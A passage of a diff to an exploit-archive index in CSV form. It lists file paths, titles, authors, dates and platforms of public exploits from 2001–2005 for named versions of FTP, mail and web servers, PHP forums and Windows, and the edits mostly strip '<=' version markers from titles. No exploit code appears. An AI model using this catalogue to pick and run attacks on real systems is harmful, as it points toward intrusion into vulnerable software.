0.95 Alpha - Remote Denial of Service Exploit",2005-08-18,RusH,cgi,dos,0 +1158,platforms/windows/dos/1158.pl,"WS_FTP Server 5.03 - (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 +1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 +1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 -1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 - Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 -1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 -1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 - Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 +1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 +1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 +1164,platforms/windows/dos/1164.pl,"BusinessMail 4.60.00 - Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 -1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 +1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0 1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Local Root Exploit",2001-07-13,"Charles Stevenson",linux,local,0 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow Exploit",2005-08-22,c0ntex,linux,remote,0 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-08-22,Alpha_Programmer,php,webapps,0 -1173,platforms/windows/local/1173.c,"Mercora IMRadio <= 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 -1174,platforms/windows/local/1174.c,"ZipTorrent <= 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 -1175,platforms/cgi/dos/1175.pl,"GTChat <= 0.95 Alpha - (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,dos,0 -1176,platforms/multiple/dos/1176.c,"Ventrilo <= 2.3.0 - Remote Denial of Service Exploit (all platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 +1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 +1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 +1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,dos,0 +1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 - Remote Denial of Service Exploit (all platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 1178,platforms/windows/remote/1178.c,"Microsoft Windows IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (French Fix)",2005-08-25,"Fabrice Mourron",windows,remote,445 @@ -985,239 +985,239 @@ id,file,description,date,author,platform,type,port 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (2)",2005-08-30,basher13,windows,remote,80 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 - Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 - (-lib) Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 -1187,platforms/linux/local/1187.c,"Gopher <= 3.0.9 - (+VIEWS) Remote (Client Side) Buffer Overflow Exploit",2005-08-30,vade79,linux,local,0 -1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager <= 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 -1189,platforms/php/webapps/1189.c,"vBulletin <= 3.0.8 Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 +1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote (Client Side) Buffer Overflow Exploit",2005-08-30,vade79,linux,local,0 +1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 +1189,platforms/php/webapps/1189.c,"vBulletin 3.0.8 Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - (Client Agent) Remote Exploit",2005-08-31,jpno5,windows,remote,6129 -1191,platforms/php/webapps/1191.pl,"Simple PHP Blog <= 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 +1191,platforms/php/webapps/1191.pl,"Simple PHP Blog 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service Exploit",2005-09-02,basher13,windows,dos,0 -1193,platforms/windows/remote/1193.pl,"Free SMTP Server <= 2.2 Spam Filter",2005-09-02,basher13,windows,remote,0 -1194,platforms/cgi/webapps/1194.c,"man2web <= 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 -1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 - (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 +1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 Spam Filter",2005-09-02,basher13,windows,remote,0 +1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 +1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 -1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 - Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 -1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 - Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 -1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager <= 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0 -1202,platforms/php/webapps/1202.php,"PBLang <= 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 +1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 +1200,platforms/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 +1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0 +1202,platforms/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 1204,platforms/multiple/dos/1204.html,"Mozilla Products (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 -1207,platforms/php/webapps/1207.php,"Class-1 Forum <= 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 -1208,platforms/php/webapps/1208.pl,"phpMyFamily <= 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0 +1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 +1208,platforms/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 -1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit (Metasploit)",2005-09-11,y0,windows,remote,1000 -1211,platforms/php/webapps/1211.pl,"PhpTagCool <= 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 -1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 -1213,platforms/multiple/dos/1213.c,"Snort <= 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit",2005-09-12,nitr0us,multiple,dos,0 -1214,platforms/php/webapps/1214.php,"AzDGDatingLite <= 2.1.3 - Remote Code Execution Exploit",2005-09-13,rgod,php,webapps,0 +1210,platforms/windows/remote/1210.pm,"WebAdmin 2.0.4 - USER Buffer Overflow Exploit (Metasploit)",2005-09-11,y0,windows,remote,1000 +1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 +1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 +1213,platforms/multiple/dos/1213.c,"Snort 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit",2005-09-12,nitr0us,multiple,dos,0 +1214,platforms/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution Exploit",2005-09-13,rgod,php,webapps,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 - (iwconfig) Local Root Exploit (some setuid)",2005-09-14,Qnix,linux,local,0 -1217,platforms/php/webapps/1217.pl,"phpWebSite <= 0.10.0 - (module) SQL Injection Exploit",2005-09-15,RusH,php,webapps,0 +1217,platforms/php/webapps/1217.pl,"phpWebSite 0.10.0 - (module) SQL Injection Exploit",2005-09-15,RusH,php,webapps,0 1218,platforms/windows/dos/1218.c,"Stoney FTPd Denial of Service Exploit (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 -1219,platforms/php/webapps/1219.c,"PHP-Nuke <= 7.8 - (modules.php) SQL Injection Exploit",2005-09-16,RusH,php,webapps,0 -1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server <= 7.1.2 - (HEAD) DoS Exploit",2005-09-16,karak0rsan,windows,dos,0 -1221,platforms/php/webapps/1221.php,"CuteNews <= 1.4.0 - (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 +1219,platforms/php/webapps/1219.c,"PHP-Nuke 7.8 - (modules.php) SQL Injection Exploit",2005-09-16,RusH,php,webapps,0 +1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - (HEAD) DoS Exploit",2005-09-16,karak0rsan,windows,dos,0 +1221,platforms/php/webapps/1221.php,"CuteNews 1.4.0 - (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command DoS Exploit",2005-09-19,basher13,windows,dos,0 -1223,platforms/windows/remote/1223.c,"Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit",2005-09-20,c0d3r,windows,remote,143 +1223,platforms/windows/remote/1223.c,"Mercury Mail 4.01a (Pegasus) IMAP Buffer Overflow Exploit",2005-09-20,c0d3r,windows,remote,143 1224,platforms/windows/remote/1224.html,"Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (2)",2005-09-22,Skylined,windows,remote,0 -1225,platforms/php/webapps/1225.php,"My Little Forum <= 1.5 - (searchstring) SQL Injection Exploit",2005-09-22,rgod,php,webapps,0 -1226,platforms/php/webapps/1226.php,"phpMyFAQ <= 1.5.1 - (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 -1227,platforms/php/webapps/1227.php,"MailGust <= 1.9 - (board takeover) SQL Injection Exploit",2005-09-24,rgod,php,webapps,0 -1229,platforms/linux/local/1229.sh,"Qpopper <= 4.0.8 - (poppassd) Local Root Exploit (Linux)",2005-09-24,kingcope,linux,local,0 -1230,platforms/bsd/local/1230.sh,"Qpopper <= 4.0.8 - (poppassd) Local Root Exploit (freebsd)",2005-09-24,kingcope,bsd,local,0 -1231,platforms/linux/remote/1231.pl,"WzdFTPD <= 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 +1225,platforms/php/webapps/1225.php,"My Little Forum 1.5 - (searchstring) SQL Injection Exploit",2005-09-22,rgod,php,webapps,0 +1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 +1227,platforms/php/webapps/1227.php,"MailGust 1.9 - (board takeover) SQL Injection Exploit",2005-09-24,rgod,php,webapps,0 +1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 - (poppassd) Local Root Exploit (Linux)",2005-09-24,kingcope,linux,local,0 +1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 - (poppassd) Local Root Exploit (freebsd)",2005-09-24,kingcope,bsd,local,0 +1231,platforms/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player Remote Format String Exploit (linux)",2005-09-26,c0ntex,linux,remote,0 -1233,platforms/multiple/dos/1233.html,"Mozilla Firefox <= 1.0.7 - Integer Overflow Denial of Service Exploit",2005-09-26,"Georgi Guninski",multiple,dos,0 +1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service Exploit",2005-09-26,"Georgi Guninski",multiple,dos,0 1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit (fbsd)",2005-09-26,"Angelo Rosiello",bsd,remote,143 1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution Exploit (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - (msg_send) SQL Injection Exploit",2005-09-28,rgod,php,webapps,0 -1238,platforms/linux/remote/1238.c,"Prozilla <= 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow Exploit",2005-10-02,taviso,linux,remote,8080 -1239,platforms/windows/dos/1239.c,"Virtools Web Player <= 3.0.0.100 - Buffer Overflow DoS Exploit",2005-10-02,"Luigi Auriemma",windows,dos,0 -1240,platforms/php/webapps/1240.php,"Utopia News Pro <= 1.1.3 - (news.php) SQL Injection Exploit",2005-10-06,rgod,php,webapps,0 -1241,platforms/php/webapps/1241.php,"Cyphor <= 0.19 - (board takeover) SQL Injection Exploit",2005-10-08,rgod,php,webapps,0 -1242,platforms/linux/remote/1242.pl,"xine-lib <= 1.1 - (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 +1238,platforms/linux/remote/1238.c,"Prozilla 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow Exploit",2005-10-02,taviso,linux,remote,8080 +1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow DoS Exploit",2005-10-02,"Luigi Auriemma",windows,dos,0 +1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - (news.php) SQL Injection Exploit",2005-10-06,rgod,php,webapps,0 +1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection Exploit",2005-10-08,rgod,php,webapps,0 +1242,platforms/linux/remote/1242.pl,"xine-lib 1.1 - (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 1243,platforms/windows/remote/1243.c,"CA iGateway (debug mode) Remote Buffer Overflow Exploit",2005-10-10,egm,windows,remote,5250 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Remote Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection Exploit",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service Exploit",2005-10-11,basher13,windows,dos,0 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 1248,platforms/solaris/local/1248.pl,"Solaris 10 - DtPrintinfo/Session Local Root Exploit (x86)",2005-10-12,"Charles Stevenson",solaris,local,0 -1250,platforms/php/webapps/1250.php,"w-Agora <= 4.2.0 - (quicklist.php) Remote Code Execution Exploit",2005-10-14,rgod,php,webapps,0 -1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server <= 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 +1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution Exploit",2005-10-14,rgod,php,webapps,0 +1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit",2005-10-15,nukedx,asp,webapps,0 -1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 -1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 - Remote Denial of Service Exploit (1)",2005-10-16,posidron,multiple,dos,0 -1255,platforms/windows/dos/1255.html,"Opera <= 8.02 - Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0 -1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 -1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 -1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 +1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 +1254,platforms/multiple/dos/1254.html,"Opera 8.02 - Remote Denial of Service Exploit (1)",2005-10-16,posidron,multiple,dos,0 +1255,platforms/windows/dos/1255.html,"Opera 8.02 - Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0 +1256,platforms/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 +1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 +1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Preauthentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 1260,platforms/windows/remote/1260.pm,"Microsoft Windows IIS - SA WebAgent 5.2/5.3 Redirect Overflow Exploit (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 -1261,platforms/hp-ux/remote/1261.pm,"HP-UX <= 11.11 - lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 +1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow Exploit (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 -1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup <= 6.0 - (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 - (bpjava-msvc) Remote Exploit (Win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup <= 6.0 - (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 - (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 +1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 - (bpjava-msvc) Remote Exploit (Win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 - (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 1267,platforms/linux/local/1267.c,"XMail 1.21 - (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 -1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 - (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 +1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,anonymous,windows,dos,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 -1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 - Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 -1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 - (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 +1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 +1273,platforms/php/webapps/1273.pl,"TClanPortal 1.1.3 - (id) SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service Exploit",2005-10-28,"Tom Ferris",windows,dos,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit",2005-10-29,ATmaCA,windows,remote,0 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit",2005-10-31,RusH,php,webapps,0 -1279,platforms/windows/remote/1279.pm,"Snort <= 2.4.2 BackOrifice Remote Buffer Overflow Exploit (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 -1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - (m) Remote SQL Injection Exploit",2005-11-02,Devil-00,php,webapps,0 -1281,platforms/windows/dos/1281.c,"Battle Carry <= .005 Socket Termination Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 +1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 BackOrifice Remote Buffer Overflow Exploit (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 +1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - (m) SQL Injection Exploit",2005-11-02,Devil-00,php,webapps,0 +1281,platforms/windows/dos/1281.c,"Battle Carry .005 Socket Termination Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 -1283,platforms/windows/dos/1283.c,"FlatFrag <= 0.3 - Buffer Overflow / Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 -1284,platforms/windows/dos/1284.c,"Glider collectn kill <= 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1285,platforms/windows/dos/1285.c,"Scorched 3D <= 39.1 - Multiple Vulnerabilities (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients <= 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1287,platforms/windows/dos/1287.c,"GO-Global Windows Server <= 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1288,platforms/linux/remote/1288.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (port bind)",2005-11-02,xwings,linux,remote,0 -1289,platforms/php/webapps/1289.php,"CuteNews <= 1.4.1 - (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 -1290,platforms/linux/remote/1290.pl,"gpsdrive <= 2.09 - (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 -1291,platforms/linux/remote/1291.pl,"gpsdrive <= 2.09 - (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 -1292,platforms/multiple/remote/1292.pm,"WzdFTPD <= 0.5.4 - (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 +1283,platforms/windows/dos/1283.c,"FlatFrag 0.3 - Buffer Overflow / Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 +1284,platforms/windows/dos/1284.c,"Glider collectn kill 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 +1285,platforms/windows/dos/1285.c,"Scorched 3D 39.1 - Multiple Vulnerabilities (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 +1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 +1287,platforms/windows/dos/1287.c,"GO-Global Windows Server 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 +1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow Exploit (port bind)",2005-11-02,xwings,linux,remote,0 +1289,platforms/php/webapps/1289.php,"CuteNews 1.4.1 - (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 +1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 - (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 +1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 - (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 +1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 -1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit",2005-11-06,B~HFH,php,webapps,0 +1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x module (vBulletin/IPB) SQL Injection Exploit",2005-11-06,B~HFH,php,webapps,0 1297,platforms/linux/local/1297.py,"F-Secure Internet Gatekeeper for Linux < 2.15.484 - Local Root Exploit",2005-11-07,"Xavier de 